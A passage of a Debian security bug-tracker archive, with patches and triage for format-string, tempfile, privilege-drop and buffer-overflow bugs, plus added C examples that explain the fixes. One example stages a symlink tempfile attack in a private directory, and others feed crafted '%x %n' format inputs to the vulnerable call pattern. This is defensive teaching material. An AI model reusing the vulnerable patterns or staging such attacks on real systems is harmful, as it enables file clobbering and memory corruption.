4.  Show us detailed HTTP logs that correspond to the attacks.

  I hope that isn't too harsh, but you've given us too little information to
 investigate even casually.

Steve
-- 




Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution

2006-05-30 Thread Steve Kemp
On Tue, May 30, 2006 at 07:14:11PM +0200, Jeroen van Wolffelaar wrote:
> On Tue, May 30, 2006 at 09:55:16AM +0200, Thijs Kinkhorst wrote:
> > On Sun, 2006-05-28 at 22:11 +0100, Steve Kemp wrote:
> > >   Uploaded.
> > 
> > Thanks! But... can't find the upload anywhere? Maybe something went
> > wrong or am I looking the wrong way?
> 
> I got a 'upload removed due to not being signed by gnupg/gpg' mail. So,
> it looks like something went wrong. 

  Strange.  I don't remember noticing an upload error, or a signing
 error.

  I've resigned + reuploaded for you.  If it works great, if not
 I guess test that network access ;)

Steve
-- 





Bug#365533: [Secure-testing-team] Re: Bug#365533: CVE-2006-1896: Admin command execution

2006-05-28 Thread Steve Kemp
On Sun, May 28, 2006 at 11:02:18PM +0200, Thijs Kinkhorst wrote:
> On Tue, 2006-05-23 at 12:36 +0200, Thijs Kinkhorst wrote:
> > Problem is that Jeroen announced that he's on a trip through Mexico
> > now,
> > so I'm left without someone to upload. Maybe the (testing) security
> > team
> > or any other DD interested in getting this bug fixed, can take a look
> > and upload?
> > 
> > Please find the updated packages here:
> > http://www.a-eskwadraat.nl/~kink/phpbb/
> 
> Still looking for an uploader here... thanks.

  Uploaded.

Steve
-- 

# The Debian Security Audit Project.
http://www.debian.org/security/audit





Bug#360657: passwd SIGSEGV on empty password

2006-04-03 Thread Steve Kemp
On Mon, Apr 03, 2006 at 10:59:32PM +0200, Matteo Croce wrote:
> Package: passwd
> Version: 1:4.0.14-9
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> Just press ^D instead of the new password and passwd will segfaults.
> I think that this is grave because it's set uid root.

  Interestingly this only happens upon my Sid machine.

  Upon Sarge it works as expected:

[EMAIL PROTECTED]:~$ passwd
Changing password for skx
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied
passwd: Authentication token manipulation error


  On unstable it behaves as you describe:

[EMAIL PROTECTED]:~$ passwd
Changing password for skx
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
Segmentation fault

  Under gdb I see this:

Retype new UNIX password: 

Program received signal SIGSEGV, Segmentation fault.
0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so

(gdb) bt
#0  0xb7d815eb in pam_sm_chauthtok () from /lib/security/pam_unix.so
#1  0xb7fa9a9a in _pam_dispatch () from /lib/libpam.so.0
#2  0xb7fabfa3 in pam_chauthtok () from /lib/libpam.so.0
#3  0x0804b1df in ?? ()
#4  0x08052388 in ?? ()
#5  0x in ?? ()


  Unfortunately I don't have time tonight to investigate, but it
 looks like it is a pam_unix.so / libpam.so bug, rather than a
 passwd bug.

Steve
-- 





Bug#350964: CVE-2006-0225, scponly shell command possible

2006-02-15 Thread Steve Kemp
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote:

> This bug has been closed for unstable (see bug 350964) with the 4.6
> upload, but will it be fixed for sarge?

  Please see DSA-969-1 released two days ago:

http://www.us.debian.org/security/2006/dsa-969

  Sarge is fixed.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/






Bug#349555: komi - FTBFS: cannot find -lgp

2006-01-25 Thread Steve Kemp
On Wed, Jan 25, 2006 at 12:29:32PM +0100, Thierry Reding wrote:
> * Bastian Blank wrote:

> > Package: komi
> > Version: 1.03-4
> > Severity: serious
> > 
> > There was an error while trying to autobuild your package:
> > 

> I've investigated this a bit, and it looks like the upstream Makefile links
> statically against SDL. I've tried rebuilding with dynamic linking and it
> solves the FTBFS.
> 
> Any reason why komi would link statically against SDL? Steve? If not, maybe
> the attached patch should be applied.

  I see nothing wrong with this patch.  (Although I'm wondering why
 this build failure didn't manifest itself previously..?)

  If you wish to upload a fixed package feel free.  Otherwise I'll
 do it tomorrow evening.

Steve
-- 





Bug#349283: tor: Tor security advisory: hidden services can be located quickly

2006-01-22 Thread Steve Kemp
On Sat, Jan 21, 2006 at 07:17:36PM -0500, Chris Howie wrote:
> Package: tor
> Version: 0.1.0.16-1
> Severity: grave
> Tags: security
> Justification: user security hole

  Tor isn't included in a Debian stable release, so no need for
 a DSA.

Steve
--





Bug#346101: Strace log not being accepted

2006-01-11 Thread Steve Kemp
On Wed, Jan 11, 2006 at 03:46:19PM -0600, Bonilla, Alejandro wrote:
> I have sent the strace of apachetop and the bug system is not letting it
> in, maybe as an spam check?
> 
> Here goes again attached.

  Cheers, got it.

  Looks like I tracked down the bug without this.  See :

http://lists.debian.org/debian-devel/2006/01/msg00648.html

  The problem appears to be that a structure is allocated and not
 initialized to NULL, so an invalid free appears.

  The fix is in the message linked to above - and I'll upload a 
 new revision shortly.

Steve
--





Bug#347221: smstools: Format string attack in logging code

2006-01-09 Thread Steve Kemp

Package: smstools
Version: 1.16-1+b1
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  A DSA has just been released for smstools due to an insecure
 usage of syslog in the logging code.

  The following patch will correct the issue:

--- smstools-1.14.8.orig/src/logging.c
+++ smstools-1.14.8/src/logging.c
@@ -78,7 +78,7 @@
   va_end(argp);
   if (Filehandle<0)
   {
-syslog(severity,text);
+syslog(severity,"%s",text);
   }
   else
   {
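Review bot: the hunk is against smstools-1.14.8 while this report is filed against 1.16-1+b1, so check that it applies to the packaged source before uploading. The `else` branch that writes to `Filehandle` lies outside the hunk; since the `va_end(argp)` two lines up shows `text` was itself just built from a caller-supplied format, confirm that branch does not hand `text` to fprintf()/dprintf() as a format in the same way, otherwise the "%s" change only closes half of the sink.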


Steve
--

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12.6-xen
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages smstools depends on:
ii  libc6 2.3.5-11   GNU C Library: Shared libraries an
ii  libmm14   1.4.0-1Shared memory library - runtime

smstools recommends no packages.

-- no debconf information
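The one-line fix above is easy to read past, so here is an added illustration, written for this page and not taken from smstools or the DSA, of what the `"%s"` changes. syslog() output cannot be captured in a buffer, so a vsnprintf() wrapper stands in for it; the message strings are constructed, and only the defined "%%" case of the bug is exercised (a "%x" or "%n" in real SMS text would read or write memory the call never passed).

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not smstools code.  syslog() is replaced by a vsnprintf()
 * wrapper so the effect of using message text as the format can be seen
 * in a buffer; the inputs below are constructed. */

/* BUG (the shape of the pre-patch call): the message text is the format
 * string.  "%%" collapses to "%"; "%x" would read a vararg that was never
 * passed; "%n" would write to memory.  Only the defined "%%" case is
 * exercised here. */
static int log_insecure(char *out, size_t outsz, const char *text, ...)
{
    va_list ap;
    va_start(ap, text);
    int n = vsnprintf(out, outsz, text, ap);   /* format = untrusted data */
    va_end(ap);
    return n;
}

/* FIX (what the patch's "%s" does): constant format, text passed as data,
 * so every byte of the message is copied literally. */
static int log_safe(char *out, size_t outsz, const char *text)
{
    return snprintf(out, outsz, "%s", text);
}

/* Audit helper: count the conversion directives a string would trigger if
 * it reached a format slot.  "%%" is an escaped percent and not counted.
 * Run it over data that is supposed to be plain text (phone numbers, SMS
 * bodies); a non-zero result on such data is a test case for the fix. */
static int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char buf[64];
    log_insecure(buf, sizeof buf, "100%% done");
    printf("insecure: %s\n", buf);   /* the %% has been consumed */
    log_safe(buf, sizeof buf, "100%% done");
    printf("safe:     %s\n", buf);   /* text reproduced byte for byte */
    printf("directives in \"balance %%x %%n\": %d\n",
           count_directives("balance %x %n"));
    return 0;
}
```

The insecure variant silently alters even harmless input (a literal "100%% done" loses a percent sign), which is the observable symptom that usually leads an auditor to the bug; the memory-corrupting cases differ only in what the directive does, not in how it got there.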





Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

2005-12-23 Thread Steve Kemp
On Fri, Dec 23, 2005 at 05:56:59PM +0100, Wouter van Heyst wrote:

> >   It looks good to me.  I've built a package and if nobody has any 
> >  objections I'll upload later today.
> 
> No objections from me.

  Great I already uploaded the package ;)

Steve
--





Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

2005-12-23 Thread Steve Kemp
On Fri, Dec 23, 2005 at 12:10:00AM +0100, Florian Ernst wrote:

> Steve, btw, any news on CVE-2005-3302 aka bug#330895 (arbitrary code
> execution when importing a .bvh file)? Last I heard you were going to
> prepare an update unless anybody had an issue with the changes made,
> yet I haven't heard of any such issues (or anything at all, to be
> precise) since then...

  Utterly slipped my mind.  :(

> FWIW, I've put together an update for Sarge's version of the blender
> package based on the upstream change mentioned above, please find
> attached a cumulative interdiff for both CVE-2005-3302 aka bug#330895
> and this bug so these issues can be resolved for Sarge.

  Great, thanks a lot.

> Please tell whether you deem those patches sufficient for a potential
> future security advisory, and if not, please provide pointers at what
> might be missing.

  It looks good to me.  I've built a package and if nobody has any 
 objections I'll upload later today.

Steve
--





Bug#344398: CVE-2005-4470: Integer overhead in header parser for .blend import

2005-12-22 Thread Steve Kemp
On Thu, Dec 22, 2005 at 02:30:46PM +0100, Moritz Muehlenhoff wrote:

> An integer overflow in the header parser for .blend files can potentially
> be exploited to execute code through a heap overflow. Please see 
> http://www.overflow.pl/adv/blenderinteger.txt for details.
> 
> This is CVE-2005-4470.

  Woody is non-free so most likely won't get updated.

  Sarge is vulnerable.

Steve
--





Bug#342550: firefox: Javascript, history.dat & DoS

2005-12-08 Thread Steve Kemp
On Thu, Dec 08, 2005 at 04:48:07PM +0200, Timo Poikola wrote:
> Package: firefox
> Version: 1.4.99+1.5rc3.dfsg-2
> Severity: grave
> Tags: security
> Justification: causes non-serious data loss
> 
> http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt
> 
> My ff does not crashed, but it ate really much cpu-time when I tested 
> slightly modified version of javascript. 

  Not a security issue, "just" a DOS attack.

  Mozilla.org do not regard DOS attacks as security issues, so we cannot
 either.

Steve
--





Bug#340284: mozilla-firefox: "su root -c firefox" gives root access to any other firefox loaded.

2005-11-22 Thread Steve Kemp
On Tue, Nov 22, 2005 at 12:36:46PM +0100, S. Thommerel wrote:

> To reproduce this bug:
> 
>  su root and then load firefox from the term. Then launch firefox from
>  another unrelated and normal user terminal. The newly launched firefox reads 
> root's
>  profile and gets root's rights.

  Isn't this expected behaviour from Firefox?  When invoking new copies
 it doesn't spawn an independent new instance, instead it connects to
 the already-running instance?

  I guess it's a security hole in a sense...

Steve
--





Bug#340079: insecure tempfiles

2005-11-20 Thread Steve Kemp
On Sun, Nov 20, 2005 at 08:17:17PM +0100, Uwe Zeisberger wrote:

> Tags: security patch

> With the attached patch applied, it uses mktemp for their creation.

  The patch is .. missing.

Steve
-- 
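Uwe's report says the (missing) patch switches the script to mktemp. As an added illustration of why that matters, here is a C replay of the stalin symlink demonstration from the top of this page, written for this page and not taken from any of the packages discussed. It runs entirely inside a throwaway mkdtemp() directory so nothing in the real /tmp is touched; the file name QobiScheme.tmp is borrowed from the stalin report as the "predictable" name, and the victim content and written data are constructed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Added example, not from stalin, node-cli or the package in this bug.  It
 * replays the symlink attack from the stalin report inside a private
 * mkdtemp() directory, then shows the two usual fixes.  The file name
 * QobiScheme.tmp is borrowed from that report as the "predictable" name. */

/* Vulnerable pattern: O_CREAT|O_TRUNC on a fixed name in a shared directory.
 * open() follows a symlink the attacker planted there first, so the victim's
 * file is truncated and overwritten.  Returns 1 if the write went through. */
static int write_predictable(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return 0;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data);
}

/* Fix 1: keep the fixed name but refuse an existing entry or a symlink.
 * Fails with EEXIST (or ELOOP) when the attacker got there first. */
static int open_fixed_safely(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Fix 2: mkstemp() picks an unpredictable name and creates it O_EXCL in one
 * step; tmpl is overwritten with the name actually used. */
static int open_unpredictable(char *tmpl)
{
    return mkstemp(tmpl);
}

/* Stage the attack and both fixes.  Returns 1 if the predictable open
 * clobbered the victim file; the out-parameters report whether each fix
 * refused or avoided the planted link.  Returns -1 on setup failure. */
static int demo(int *fixed_refused, int *mkstemp_avoided)
{
    const char *base = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    char dir[PATH_MAX], victim[PATH_MAX], lnk[PATH_MAX], tmpl[PATH_MAX];
    snprintf(dir, sizeof dir, "%s/tmpfile-demo-XXXXXX", base);
    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/QobiScheme.tmp", dir);
    snprintf(tmpl, sizeof tmpl, "%s/QobiScheme.XXXXXX", dir);

    /* victim's file with known content, then the attacker's symlink */
    FILE *f = fopen(victim, "w");
    if (!f)
        return -1;
    fputs("precious\n", f);
    fclose(f);
    if (symlink(victim, lnk) != 0)
        return -1;

    /* the program writes its "uname -m" output to the predictable path */
    int clobbered = write_predictable(lnk, "x86_64\n");
    char buf[32] = {0};
    f = fopen(victim, "r");
    if (f) {
        size_t got = fread(buf, 1, sizeof buf - 1, f);
        buf[got] = '\0';
        fclose(f);
    }
    clobbered = clobbered && strcmp(buf, "x86_64\n") == 0;

    int fd = open_fixed_safely(lnk);
    *fixed_refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0)
        close(fd);

    fd = open_unpredictable(tmpl);
    *mkstemp_avoided = (fd >= 0 && strcmp(tmpl, lnk) != 0);
    if (fd >= 0) {
        close(fd);
        unlink(tmpl);
    }

    unlink(lnk);
    unlink(victim);
    rmdir(dir);
    return clobbered;
}

int main(void)
{
    int refused = 0, avoided = 0;
    int clobbered = demo(&refused, &avoided);
    printf("predictable name clobbered victim: %d\n", clobbered);
    printf("O_EXCL|O_NOFOLLOW refused planted link: %d\n", refused);
    printf("mkstemp() avoided planted link: %d\n", avoided);
    return 0;
}
```

Shell scripts get the same two choices: `mktemp` for an unpredictable name, or `set -o noclobber` plus a check that the fixed path is not a symlink before writing. The fixed-name variant only helps if the program also copes with EEXIST, which a stale file from a previous run will trigger.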






Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code

2005-11-16 Thread Steve Kemp
On Wed, Nov 16, 2005 at 02:05:11PM +0100, Loic Minier wrote:
>  Security team, did you start work on CVE-2005-3186 and CVE-2005-2975,
>  CVE-2005-2976 (not described in this report)?  Ubuntu has released some
>  packages which might help .

>  Do you need the Gtk maintainers to prepare an upload for stable?

  That would certainly be appreciated.

Steve
--





Bug#338312: osh: Environment Variable Input Validation Bug

2005-11-09 Thread Steve Kemp
On Wed, Nov 09, 2005 at 04:42:08AM -0800, Charles Stevenson wrote:

> Due to a bug in the environment variable substitution code it is
> possible to inject environment variables such as LD_PRELOAD and gain a
> root shell.

  Confirmed.

  Joey, we'll need an ID for it.
  
  I guess we need to use two buffers to handle the expansion correctly...

Steve
--



Bug#328129: PATCH: The following patch fixes this issue

2005-11-03 Thread Steve Kemp

  The following patch extracted from the SF.net discussion linked
 above fixes the issue for me.

Steve
--

--- xine-ui-0.99.3.orig/src/xitk/menus.c
+++ xine-ui-0.99.3/src/xitk/menus.c
@@ -425,8 +425,7 @@
   int  x, y;
   xitk_menu_widget_t   menu;
   char buffer[2048];
-  char*sh[255];
-  int  shc = 0;
+  int  i;
   xitk_widget_t   *w;
 #ifdef HAVE_XINERAMA
   int  fullscr_mode = (FULLSCR_MODE | FULLSCR_XI_MODE);
@@ -439,15 +438,15 @@
   "",  
   NULL, NULL   
  },
 { _("Show controls"),
-  (sh[shc++] = menu_get_shortcut("ToggleVisibility")),
+  menu_get_shortcut("ToggleVisibility"),
   panel_is_visible() ? "" : "",  
   menu_panel_visibility, NULL  
  },
 { _("Show video window"),
-  (sh[shc++] = menu_get_shortcut("ToggleWindowVisibility")),
+  menu_get_shortcut("ToggleWindowVisibility"),
   video_window_is_visible() ? "" : "",  
   menu_video_ctrl, (void *) VIDEO_TOGGLE   
  },
 { _("Fullscreen"),
-  (sh[shc++] = menu_get_shortcut("ToggleFullscreen")),
+  menu_get_shortcut("ToggleFullscreen"),
   (video_window_get_fullscreen_mode() & fullscr_mode) ? "" : 
"",
   menu_video_ctrl, (void *) VIDEO_FULLSCR  
  },
 { "SEP",  
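Review bot: this is the first of a long run of identical `(sh[shc++] = menu_get_shortcut(...))` to `menu_get_shortcut(...)` edits; the remaining hunks are mechanical, but the removed `sh[255]` with an unchecked `shc++` is worth a one-line comment at the top of the function so the next reader knows why the tracking array went away.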
@@ -459,7 +458,7 @@
   "",   
   NULL, NULL   
  },
 { _("Open/File..."),
-  (sh[shc++] = menu_get_shortcut("FileSelector")),
+  menu_get_shortcut("FileSelector"),
   NULL,
   menu_file_selector,NULL  
  },
 { _("Open/Playlist..."),
@@ -467,7 +466,7 @@
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_LOAD  
  },
 { _("Open/Location..."),
-  (sh[shc++] = menu_get_shortcut("MrlBrowser")),
+  menu_get_shortcut("MrlBrowser"),
   NULL,
   menu_mrl_browser, NULL   
  },
 { _("Playback"),
@@ -475,15 +474,15 @@
   "",
   NULL, NULL   
  },
 { _("Playback/Play"),
-  (sh[shc++] = menu_get_shortcut("Play")),
+  menu_get_shortcut("Play"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PLAY  
  },
 { _("Playback/Stop"),
-  (sh[shc++] = menu_get_shortcut("Stop")),
+  menu_get_shortcut("Stop"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_STOP  
  },
 { _("Playback/Pause"),
-  (sh[shc++] = menu_get_shortcut("Pause")),
+  menu_get_shortcut("Pause"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PAUSE 
  },
 { _("Playback/SEP"),
@@ -491,11 +490,11 @@
   "",  
   NULL,  NULL  
  },
 { _("Playback/Next MRL"),
-  (sh[shc++] = menu_get_shortcut("NextMrl")),
+  menu_get_shortcut("NextMrl"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_NEXT  
  },
 { _("Playback/Previous MRL"),
-  (sh[shc++] = menu_get_shortcut("PriorMrl")),
+  menu_get_shortcut("PriorMrl"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_PREV  
  },
 { _("Playback/SEP"),
@@ -503,11 +502,11 @@
   "",  
   NULL,  NULL  
  },
 { _("Playback/Increase Speed"),
-  (sh[shc++] = menu_get_shortcut("SpeedFaster")),
+  menu_get_shortcut("SpeedFaster"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_SPEEDM
  },
 { _("Playback/Decrease Speed"),
-  (sh[shc++] = menu_get_shortcut("SpeedSlower")),
+  menu_get_shortcut("SpeedSlower"),
   NULL,
   menu_playback_ctrl, (void *) PLAYB_SPEEDL
  },
 { _("Playlist"),
@@ -523,7 +522,7 @@
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_LOAD  
  },
 { _("Playlist/Editor..."),
-  (sh[shc++] = menu_get_shortcut("PlaylistEditor")),
+  menu_get_shortcut("PlaylistEditor"),
   NULL,
   menu_playlist_ctrl, (void *) PLAYL_EDIT  
  },
 { _("Playlist/SEP"),  
@@ -555,7 +554,7 @@
   (gGui->playlist.loop == PLAYLIST_LOOP_SHUF_PLUS) ? "" : 
"",
   menu_playlist_ctrl, (void *) PLAYL_SHUF_PLUS 
  },
  

Bug#335817: wordpress: SECURITY : Contains an insecure version of class.snoopy

2005-10-25 Thread Steve Kemp
Package: wordpress
Version: 1.5.2-2
Severity: grave
Justification: user security hole


  As described upon the following bugtraq post the class Snoopy which
 is included in wordpress potentially allows arbitrary command execution.

http://seclists.org/lists/fulldisclosure/2005/Oct/0536.html

  The class is contained within the wordpress distribution - although
 I haven't explicitly told them yet, I leave it to you to give them
 a nod.

Steve
--
  

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)





Bug#335439: vncserver: passwords over 8 chars not handled correctly

2005-10-23 Thread Steve Kemp
On Sun, Oct 23, 2005 at 08:19:35PM -0400, Collin E Borrlewyn wrote:

> vncserver lets me in without supplying the full password.
> 
> To reproduce this:
> start vncserver: vncserver :1
> whe prompted enter a password of eight or more characters
> start xvncviewer and connect to :1
> when prompted enter the first eight characters of the password and hit enter
> You have been authenticated.

  This appears to be a known weakness in VNC, for which I can find
 references going back to 1999.

  e.g.

http://www.realvnc.com/pipermail/vnc-list/1999-November/010853.html


  The source documents this:

vnc-3.3.7/vncpasswd/vncpasswd.c

  "Always ignore anything after 8 characters, since this is what Solaris
getpass() does anyway."


  As does "man vncpasswd":

  "The password must be at least six characters long, and only the first eight
characters are significant"

  Perhaps a more prominent warning is required, but I consider it unlikely
 that this will be fixed if upstream is content with the current state.

Steve
--





Bug#333734: curl: Buffer overflow in NTLM authentication

2005-10-13 Thread Steve Kemp
On Thu, Oct 13, 2005 at 03:03:42PM +0200, Moritz Muehlenhoff wrote:
> Package: curl
> Version: 7.14.1-5
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> Another buffer overflow has been found in curl's NTLM authentication
> code. (This one is different from CAN-2005-0490 and doesn't seem to
> have a CVE assignment yet). Please see 
> http://www.mail-archive.com/wget%40sunsite.dk/msg08294.html
> for more information.

  Noted already, and an update for Sarge should be available soon.

Steve
--





Bug#333682: security problem within CDDB communication

2005-10-13 Thread Steve Kemp
On Thu, Oct 13, 2005 at 10:52:28AM +0200, Michal Čihař wrote:

> xine announcement [1] is four days old, it says issue has been found by
> Debian Security Audit Project, so I'd expect that Debian will have it
> fixed also :-).

  We do.

> Sorry if you're already working on this issue and I interrupt you from
> work, but I wanted to make sure you know about this.

  Please see DSA-863, released on the 12th of October:

http://www.us.debian.org/security/2005/dsa-863

Steve
--





Bug#327722: Patch for Gopher bug CAN-2005-2772

2005-09-26 Thread Steve Kemp
On Mon, Sep 26, 2005 at 09:23:16AM -0500, John Goerzen wrote:

> >   Attached are the patches that Joey (Schulze) approved.
> 
> Can you (or Joey) comment: did you use a different patch because you
> believe mine to be insecure, or for a different reason?  (That's an
> important question, since as you know, my patch was uploaded to unstable
> and will presumably be in the next stable release.)

  Your patch looks good.

  The reason that I used the one I did was because it was created
 a few weeks ago when there was no other patch publicly
 available.  Had I seen yours at the time I would have used it
 instead, rather than going with something different.

  I certainly don't think you need do anything drastic like
 use the one I made in another upload.  Although it was a 
 fair question to ask.

Steve
--





Bug#325769: Format string security hole in anon-proxy

2005-08-30 Thread Steve Kemp

Package: anon-proxy
Version: 00.02.39-7
Severity: serious
Tags: patch, upstream


  The logging code in anon-proxy contains a misuse of the syslog function
 allowing potential remote compromise of the host it is running upon.

  (This depends whether logging is enabled).

  The patch below fixes the issue.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

--- CAMsg.cpp-orig  2005-08-29 21:17:42.0 +0100
+++ CAMsg.cpp   2005-08-29 21:18:30.0 +0100
@@ -124,7 +124,7 @@
{
case MSG_LOG:
#ifndef _WIN32
-   
syslog(type,oMsg.m_strMsgBuff);
+   
syslog(type,"%s",oMsg.m_strMsgBuff);
#endif
break;
case MSG_FILE:
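Review bot: the + line is the correct fix: oMsg.m_strMsgBuff is the text being logged, and handing it to syslog() as the format lets any % directive in logged input drive the formatter, whereas the "%s" form treats it purely as data. Two follow-ups: check that the case MSG_FILE: branch right after this hunk does not pass the same buffer as a format string to whatever writes the log file, and build with -Wformat-security so the compiler flags any remaining call of the old shape.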

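As an added example, not anon-proxy's code: the "%s" discipline from the patch above wrapped in a small logging helper, plus a check that counts the printf directives in an untrusted message so a reviewer or log monitor can see what the original call would have interpreted. The function names and the sample message are assumptions made for this example.

```c
/* Added example (not anon-proxy's code): log untrusted text the way the
 * fix does, and measure how many printf directives such text contains. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Constructed sample: the kind of input that would have been dangerous as
 * a format string in the original syslog(type, buf) call. */
static const char kSampleMessage[] = "user=%s id=%x";

/* Count the conversion directives a printf-family function would act on if
 * this string were used as its format. A doubled "%%" is a literal percent
 * sign and is not counted; a trailing lone '%' is counted, because the
 * formatter would still try to read a conversion after it. */
size_t format_directive_count(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent: skip both characters */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Safe shape from the '+' line: the message is always an argument, never
 * the format, so its content is copied verbatim whatever it contains. */
void log_untrusted(int priority, const char *msg)
{
    syslog(priority, "%s", msg);
}

/* Same discipline into a caller-supplied buffer so the result can be
 * inspected; returns the length the full message would have had. */
int render_untrusted(char *out, size_t outlen, const char *msg)
{
    return snprintf(out, outlen, "%s", msg);
}
```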





Bug#325135: maildrop: lockmail doesn't drop privileges

2005-08-28 Thread Steve Kemp
On Sat, Aug 27, 2005 at 07:03:55PM -0400, Andres Salomon wrote:

> >   Certainly.  Once the advisory is out I can make an upload if Joy
> >  hasn't already made one.
> > 
> 
> I can also do an upload; Joy already said I should comaintain, I've just
> been waiting for racke to do a new courier upload so that I can actually
> use maildrop (I have new maildrop packages in experimental that're just
> rotting away, waiting).

  I'll leave it to you then, unless you tell me differently.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit






Bug#325135: maildrop: lockmail doesn't drop privileges

2005-08-27 Thread Steve Kemp
On Sat, Aug 27, 2005 at 12:27:51PM +0200, Martin Schulze wrote:

> Thanks a lot for the report.  This is CAN-2005-2655.
> 
> > The bug affects 1.5.3-1.1 sarge/etch/sid and 1.8.1-2 in experimental,
> > and should be easy to fix: Just add setgid(getgid()) before the
> > execvp(). I tested the attached patch briefly and verified that it
> > builds and prevents this bug.
> 
> Steve, could you take care of sid and experimental packages if Joy
> is too busy?

  Certainly.  Once the advisory is out I can make an upload if Joy
 hasn't already made one.

Steve
--

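As an added example, not maildrop's code: the setgid(getgid())-before-execvp() fix described above, with the drop verified rather than assumed and the supplementary group list cleared when the process happens to be root. The function names are assumptions made for this example.

```c
/* Added example (not maildrop's code): give up a setgid binary's group
 * before exec'ing a user-supplied command, and verify the drop took. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1       /* setgroups() prototype in <grp.h> */
#endif
#include <errno.h>
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 once the effective gid equals the real gid, -1 with errno set
 * otherwise. For a setgid-but-not-root process setgid() changes only the
 * effective gid; that is enough before an exec, because execve() copies
 * the effective gid into the saved gid, so the new program cannot switch
 * back to the privileged group. */
int drop_group_privs(void)
{
    gid_t real = getgid();

    /* Only root may rewrite the supplementary list; shrink it to the real gid. */
    if (geteuid() == 0 && setgroups(1, &real) != 0)
        return -1;

    if (setgid(real) != 0)
        return -1;

    /* Never trust the call alone: confirm the kernel actually switched. */
    if (getegid() != real) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Drop the group first, then exec. Returns -1 only on failure, since a
 * successful execvp() never returns to the caller. */
int exec_unprivileged(char *const argv[])
{
    if (drop_group_privs() != 0)
        return -1;
    execvp(argv[0], argv);
    return -1;
}
```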



